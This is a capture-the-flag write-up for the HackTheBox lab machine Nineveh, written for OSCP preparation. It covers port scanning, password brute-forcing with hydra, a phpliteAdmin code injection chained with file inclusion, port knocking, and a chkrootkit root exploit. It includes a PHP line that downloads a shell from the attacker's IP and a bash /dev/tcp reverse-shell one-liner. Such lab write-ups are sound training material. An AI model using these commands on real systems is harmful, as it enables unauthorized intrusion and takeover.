HacktheBox - Nineveh Writeup
Zero to OSCP Hero Writeup #15 - Nineveh
Reconnaissance
1. Nmap Scan - Common Ports TCP Scan
Let's start with a TCP scan of the target ip address to determine which common ports are open and which services are running on those ports:
nmap -sC -sV -oA nmap/initial.tcp 10.10.10.43
- -sC: Run the default nmap script scan to find potential vulnerabilities
- -sV: Detect the service version
- -oA: Output the result of the scan in all formats as nmap/initial.tcp
So from the scan we see that only ports 80 and 443 are open, we can also see that there is domain name for the box too, ninemeh.htb, we can add this to our /etc/hosts file.
1.1. Add domain name to /etc/hosts file
nano /etc/hosts
10.10.10.43 nineveh.htb
2. Nmap Scan - All TCP Ports Scan
Okay, lets scan the entire TCP port range to confirm that there are no other ports open:
nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.43
- -sC: Run the default nmap script scan to find potential vulnerabilities
- -sV: Detect the service version
- -p-: Run the nmap scan against all ports
- -oA: Output the result of the scan in all formats as nmap/full.tcp
The full TCP scan confirmed that there are no addional ports open.
3. Nmap Scan - All UDP Ports Scan
We can do the same full port scan, but with the UDP ports:
nmap -sU -p- -oA nmap/full.udp 10.10.10.43
- -sU: Run the scan against UDP ports
- -p-: Run the nmap scan against all ports
- -oA: Output the result of the scan in all formats as nmap/full.tcp
The full UDP scan confirmed that there are no additional ports open.
Enumerating Port 80
1. Browse to https://nineveh.htb
When we browse to https://nineveh.htb, we get a default web page:
When we check the page source code, there is a comment in there from a user called amrois, to another user, admin:
2. Check for hidden directories
As there is not much to go off here, lets see if there are any hidden directories with gobuster:
gobuster dir -u https://10.10.10.43 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
2.1 Check the hidden directory, /department
After browsing to https://nineveh.htb/department we see that it directs us to a login page.
After checking for potential SQL injection with sqlmap, it seems that the login page isnt vulerable to it, although there is a flaw with the login page as it will show you a different error message when inputting invalid and valid usernames from the database:
Invalid Username (entering the username: username):
Valid Username (Entering the username: admin):
With this flaw, we are able to detemine valid usernames by taking note of the error message.
3. Testing potential passwords for the admin user
As we know that admin is a valid user, im going to use hydra to try potential passwords and see if we can get valid credentials by bruteforcing the login page:
hydra 10.10.10.43 -l admin -P /usr/share/seclists/Passwords/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" -V
And we found valid admin credentials!
admin:1q2w3e4r5t
4. Login to the department login page
After logging in, we are greeted with a under contruction image:
And when we click on the notes tab, we are greeted with these notes:
There doesnt seem to be much else to check through on port 80, lets now move onto port 443!
Enumerating Port 443
1. Browse to https://nineveh.htb
Again, we are greeted with just an image with no other information.
2. Check for hidden directories
As there is only an image on the main page, lets see if there are any hidden directories with gobuster:
gobuster dir -k -u https://10.10.10.43 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Note that we have added the -k flag, this is needed when testing via https to bypass the X509 certification errors.
So there are a couple of interesting directories, /db and /secure_notes, lets check out /db first.
2.1 Checking the hidden directory /db
After browsing the https://nineveh.htb/db we find ourselves at another login page, this time its for the application, phpliteAdmin v1.9
3. Searching for phpliteAdmin 1.9 exploits
Lets see if there are any exploits for this version of phpliteAdmin with searchsploit:
searchsploit phpliteadmin 1.9
The top exploit seems interesting, lets look at it in more detail:
searchsploit -x exploits/php/webapps/24044.txt
So the exploit requires us to create/change databases, meaning we need to be authenticated!
4. Bruteforcing phpliteAdmin login
Lets again utilise hydra to bruteforce the login for phpliteAdmin:
hydra 10.10.10.43 -l anything -P /usr/share/seclists/Passwords/rockyou.txt https-post-form "/db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -V -s 443
As the phpliteAdmin login form only requires a password, we can use any username we wish for the -l flag.
To find the required parameters needed for the hydra command, we can see them by capturing a burp login request:
And again, rockyou.txt has the valid password... Password123
Initial Foothold - User
1. Log in to phpliteAdmin
Now that we have the valid password, we can now login to phpliteAdmin:
2. Follow the POC of the PHP remote code injection exploit
Lets follow the POC for the exploit: https://www.exploit-db.com/exploits/24044
2.1 Create new database
Im going to create a new database, ninevehNotes.php, the reason for calling the database this will become clear in just a sec:
Once it is created, we see the exact path to the created database: /var/tmp/<db>
3. Create a new table in the pathtoroot.php database
To add a one liner command that will call back to our attacker machine and download a shell script, we need to create a table. We will call the table, table.
3.1 Add php one liner to the table
We now need to changed the type from INTERGER to TEXT and add a php one liner to the table in the Default Value field. which will download our php reverse shell script file:
<?php system("wget https://10.10.14.59:8080/shell.php -O /var/tmp/shell.php); ?>
3.2 Create shell.php file from kali php reverse shell
Okay, now we need to use the trusty php reverse shell file that comes with kali and rename it to shell.php and change the IP and Port for the connection:
3.3 Start python webserver
Once the shell.php file has been created, we now need to start a webserver so the machine can download it:
python -m SimpleHTTPServer 8080
3.4 Start Netcat listener
... and Start a netcat listener to capture the connection from the machine once it executes the shell.php file.
nc -lvnp 9001
4. Browse to the created database
We are all set now to have the machine download our shell.php file. The location we are using for this is back on port 80 via the notes page.
On the notes page, the URL showed a potential LFI:
?notes=file/ninevehNotes.txt
We will exploit this by entering /var/tmp/ninevehNotes.php instead of file/ninevehNotes.txt:
https://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php
We get a connection to our netcat listener as www-data!
Even though we are on the machine, we still dont have access to the user.txt file as we are only on the machine as www-data.
5. Make our shell fully interactive
https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell
6. Taking a look at the secure_notes directory
After I couldnt find anything of interest after a brief look around the usual priv esc methods, i went back to my initial enumeration of the directories and remembered the secure_notes directory.
Lets go back to it, and save the image to our attacker machine.
6.1 Running Binwalk on the image
I'm going to run binwalk on the image to see if there is anything hidden inside the image file.
binwalk nineveh.png
Aha. The output shows that there is a compressed zlib folder inside the image.
Lets run binwalk again, but with the -Me flag. This extracts all the contents inside of the image file.
binwalk -Me nineveh.png
Lets see what contents were found in the image through the directory created by binwalk, _nineveh.png.extracted:
We see that there is a folder called 'secret', this contains an RSA private key!
7. Running Netstat
We may have the private key which we could use with SSH, but remember from our nmap scan, Port 22/SSH was not open.
Lets instead check locally using netstat:
netstat -aunt |grep LISTEN
So Port 22 which is used by SSH is listening on the machine! The reason for the nmap scan not finding port 22 open is down to the rules in the /etc/iptables/rules.v4 file:
As you can see, any tcp scan packets on any port other than 80 or 443 will be dropped.
8. Port Knocking to allow external SSH access
Port knocking is the method used to grant remote access without leaving a port open constantly. This protects the identity of such a port being used from port scanning, as we have seen!
To use port knocking, the server must have a firewall and run the knock-daemon, /etc/knockd. Simply, the daemon is listening for a specific sequence of TCP or UDP packets, if the sequence of packets is correct, then usually the source IP address of the port knocking is given access through the firewall to the assigned knocking port.
8.1 Check the /etc/knockd.conf file
Inside the knockd.conf file, will have the correct knock sequence needed to open the SSH port 22:
cat /etc/knockd.conf
As you can see, for Port 22 to open, we need to send tcp packets to port 571, 290 and 911.
8.2 Creating a for loop to open Port 22
I created this for loop that will send packets to the sequence ports which should then give us SSH access, lets give it a go:
for i in 571 290 911; do nmap -Pn --max-retries 0 -p $i 10.10.10.43; done
8.3 Confirm Port 22 is now open
We can run a basic nmap port scan to check if port 22 is now open:
nmap -p 22 10.10.10.43
Bingo! :D
9. Use RSA Private Key to login as amoris via SSH
Lets now try and login with the found private key:
chmod 600 nineveh.priv
ssh amoris@10.10.10.43 -i nineveh.priv
10. Grab the user.txt flag
cat user.txt
Privilege Escalation - Root
1. Running LinEnum.sh
I downloaded LinEnum to the machine using python webserver and wget to download the LinEnum.sh file.
Make the script executable then run it:
chmod +x LinEnum.sh
./LinEnum.sh
1.1 Out of place crontab
Going through the linenum output, i found a crontab that seemed interesting:
2. Checking contents of report-reset.sh
Okay, so the cron executes this script that removes any files with the .txt extension from a directory called /report
3. Checking the /report directory
Lets find the report directory and see what contents it holds:
cd /report/
ls -l
Okay, so it seems that a report is created every minute, probably via a cronjob, lets see what one of the reports has inside:
cat report-19-11-28:22:49.txt
Okay, so as you can see from the sample of the report above shows, its seems to be checking files for infections by rootkits. After a google, it seems that these reports are from a rootkit checker called chkrootkit.
We were able to confirm this by checking to see if chkrootkit was on the machine:
locate chkrootkit
4. Checking for chkrootkit vulnerabilities
Lets check searchsploit to see if there are any exploits for chkrootkit:
searchsploit chkrootkit
So it seems that chkrootkit is our way to root by exploiting a local priv esc exploit!
5. chkrootkit Local Priv Esc Exploit
Lets take a more detailed look at the exploit:
searchsploit -x exploits/linux/local/33899.txt
Pretty simple exploit- add a reverse shell file in the /tmp folder and call it update!
5.1 Create bash reverse shell one liner file and call it 'update'
i'm going to utilise the pentest monkey reverse shell cheat sheet and use a bash one liner:
cd /tmp
nano update
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.59/9002 0>&1
5.2 Start netcat listener
Now we need to start a listener to capture the connection:
nc -lvnp 9002
We now have a connection from chkrootkit as root!
6. Grab root.txt
cat root.txt
Conclusion
Next up is Box #16 - Grandpa!
